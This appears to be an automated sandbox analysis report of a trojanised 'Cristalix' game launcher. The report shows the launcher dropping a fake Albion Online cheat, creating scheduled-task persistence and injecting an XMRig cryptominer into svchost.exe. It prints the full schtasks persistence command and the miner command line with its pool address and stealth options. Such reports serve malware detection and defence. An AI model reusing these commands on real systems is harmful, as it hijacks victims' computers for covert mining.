Analysis
-
max time kernel
120s -
max time network
158s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
17-07-2021 22:29
Static task
static1
Behavioral task
behavioral1
Sample
Cristalix/Cristalix_New_t.exe
Resource
win7v20210410
General
-
Target
Cristalix/Cristalix_New_t.exe
-
Size
6.5MB
-
MD5
c2b39eba635ba5dc92c1a7aaf6999be3
-
SHA1
65800969eb6066c6d3632b176d2c7bb97664a69a
-
SHA256
e3bdbc55c8c0d6eb4c87bf3f3670fbb58d6ed8d87d5feb21b502298532a45fbb
-
SHA512
611cc6eaadb361cb4a37915c964778d5caa307027d406295cce41986133c682b1b446f65af156a1ab71c8aacda8934ac3cd29c51e0771340553eac3d6a1d5f61
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1020-151-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/1020-152-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/1020-154-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 5 IoCs
Processes:
AlbionOnline cheat v0.1.2.exeCristalixLauncher-3.0.145.exesihost64.exeServices.exesihost64.exepid process 3568 AlbionOnline cheat v0.1.2.exe 3976 CristalixLauncher-3.0.145.exe 3944 sihost64.exe 3948 Services.exe 2364 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Services.exedescription pid process target process PID 3948 set thread context of 1020 3948 Services.exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 408 3036 WerFault.exe javaw.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
WerFault.exeAlbionOnline cheat v0.1.2.exeServices.exepid process 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 408 WerFault.exe 3568 AlbionOnline cheat v0.1.2.exe 3568 AlbionOnline cheat v0.1.2.exe 3948 Services.exe 3948 Services.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
WerFault.exeAlbionOnline cheat v0.1.2.exeServices.exesvchost.exedescription pid process Token: SeDebugPrivilege 408 WerFault.exe Token: SeDebugPrivilege 3568 AlbionOnline cheat v0.1.2.exe Token: SeDebugPrivilege 3948 Services.exe Token: SeLockMemoryPrivilege 1020 svchost.exe Token: SeLockMemoryPrivilege 1020 svchost.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
Cristalix_New_t.exeCristalixLauncher-3.0.145.exeAlbionOnline cheat v0.1.2.execmd.exeServices.execmd.exedescription pid process target process PID 664 wrote to memory of 3568 664 Cristalix_New_t.exe AlbionOnline cheat v0.1.2.exe PID 664 wrote to memory of 3568 664 Cristalix_New_t.exe AlbionOnline cheat v0.1.2.exe PID 664 wrote to memory of 3976 664 Cristalix_New_t.exe CristalixLauncher-3.0.145.exe PID 664 wrote to memory of 3976 664 Cristalix_New_t.exe CristalixLauncher-3.0.145.exe PID 664 wrote to memory of 3976 664 Cristalix_New_t.exe CristalixLauncher-3.0.145.exe PID 3976 wrote to memory of 3036 3976 CristalixLauncher-3.0.145.exe javaw.exe PID 3976 wrote to memory of 3036 3976 CristalixLauncher-3.0.145.exe javaw.exe PID 3568 wrote to memory of 3372 3568 AlbionOnline cheat v0.1.2.exe cmd.exe PID 3568 wrote to memory of 3372 3568 AlbionOnline cheat v0.1.2.exe cmd.exe PID 3372 wrote to memory of 796 3372 cmd.exe schtasks.exe PID 3372 wrote to memory of 796 3372 cmd.exe schtasks.exe PID 3568 wrote to memory of 3944 3568 AlbionOnline cheat v0.1.2.exe sihost64.exe PID 3568 wrote to memory of 3944 3568 AlbionOnline cheat v0.1.2.exe sihost64.exe PID 3568 wrote to memory of 3948 3568 AlbionOnline cheat v0.1.2.exe Services.exe PID 3568 wrote to memory of 3948 3568 AlbionOnline cheat v0.1.2.exe Services.exe PID 3948 wrote to memory of 508 3948 Services.exe cmd.exe PID 3948 wrote to memory of 508 3948 Services.exe cmd.exe PID 508 wrote to memory of 1176 508 cmd.exe schtasks.exe PID 508 wrote to memory of 1176 508 cmd.exe schtasks.exe PID 3948 wrote to memory of 2364 3948 Services.exe sihost64.exe PID 3948 wrote to memory of 2364 3948 Services.exe sihost64.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe PID 3948 wrote to memory of 1020 3948 Services.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe"C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe"C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6065131 --pass=myminer --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3036 -s 3564⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exeMD5
b46efcd7dbf7d2a57ca3e942fffb2214
SHA1f8cf84367ce616c00e9966bd08d35084eec64010
SHA25647955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7
SHA512f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f
-
C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exeMD5
b46efcd7dbf7d2a57ca3e942fffb2214
SHA1f8cf84367ce616c00e9966bd08d35084eec64010
SHA25647955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7
SHA512f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f
-
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exeMD5
25b608146d97e46e5cb8d5d4a77440c5
SHA1ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab
SHA2568504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9
SHA5123ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9
-
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exeMD5
25b608146d97e46e5cb8d5d4a77440c5
SHA1ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab
SHA2568504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9
SHA5123ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9
-
C:\Users\Admin\AppData\Local\Temp\Services.exeMD5
b46efcd7dbf7d2a57ca3e942fffb2214
SHA1f8cf84367ce616c00e9966bd08d35084eec64010
SHA25647955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7
SHA512f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f
-
C:\Users\Admin\AppData\Local\Temp\Services.exeMD5
b46efcd7dbf7d2a57ca3e942fffb2214
SHA1f8cf84367ce616c00e9966bd08d35084eec64010
SHA25647955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7
SHA512f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sysMD5
0c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
95099533bd1ac8cb7c824e9bc59a0891
SHA1da546ebffa55004dbdf20f17a25a55f89a05f089
SHA256066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772
SHA512aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
95099533bd1ac8cb7c824e9bc59a0891
SHA1da546ebffa55004dbdf20f17a25a55f89a05f089
SHA256066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772
SHA512aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
95099533bd1ac8cb7c824e9bc59a0891
SHA1da546ebffa55004dbdf20f17a25a55f89a05f089
SHA256066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772
SHA512aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
95099533bd1ac8cb7c824e9bc59a0891
SHA1da546ebffa55004dbdf20f17a25a55f89a05f089
SHA256066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772
SHA512aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35
-
memory/508-141-0x0000000000000000-mapping.dmp
-
memory/796-126-0x0000000000000000-mapping.dmp
-
memory/1020-153-0x0000016CDA730000-0x0000016CDA750000-memory.dmpFilesize
128KB
-
memory/1020-151-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1020-154-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1020-152-0x00000001402EB66C-mapping.dmp
-
memory/1176-142-0x0000000000000000-mapping.dmp
-
memory/2364-144-0x0000000000000000-mapping.dmp
-
memory/2364-156-0x0000000001280000-0x0000000001282000-memory.dmpFilesize
8KB
-
memory/3036-122-0x0000000000000000-mapping.dmp
-
memory/3372-125-0x0000000000000000-mapping.dmp
-
memory/3568-124-0x0000000001E00000-0x0000000001E02000-memory.dmpFilesize
8KB
-
memory/3568-123-0x000000001D750000-0x000000001D96B000-memory.dmpFilesize
2.1MB
-
memory/3568-114-0x0000000000000000-mapping.dmp
-
memory/3568-117-0x0000000000EE0000-0x0000000000EE1000-memory.dmpFilesize
4KB
-
memory/3944-139-0x0000000000C30000-0x0000000000C32000-memory.dmpFilesize
8KB
-
memory/3944-137-0x00000000008E0000-0x00000000008E2000-memory.dmpFilesize
8KB
-
memory/3944-131-0x00000000000E0000-0x00000000000E1000-memory.dmpFilesize
4KB
-
memory/3944-127-0x0000000000000000-mapping.dmp
-
memory/3948-130-0x0000000000000000-mapping.dmp
-
memory/3948-150-0x00000000038E0000-0x00000000038EA000-memory.dmpFilesize
40KB
-
memory/3948-143-0x00000000038C0000-0x00000000038C1000-memory.dmpFilesize
4KB
-
memory/3948-140-0x000000001DA02000-0x000000001DA03000-memory.dmpFilesize
4KB
-
memory/3976-118-0x0000000000000000-mapping.dmp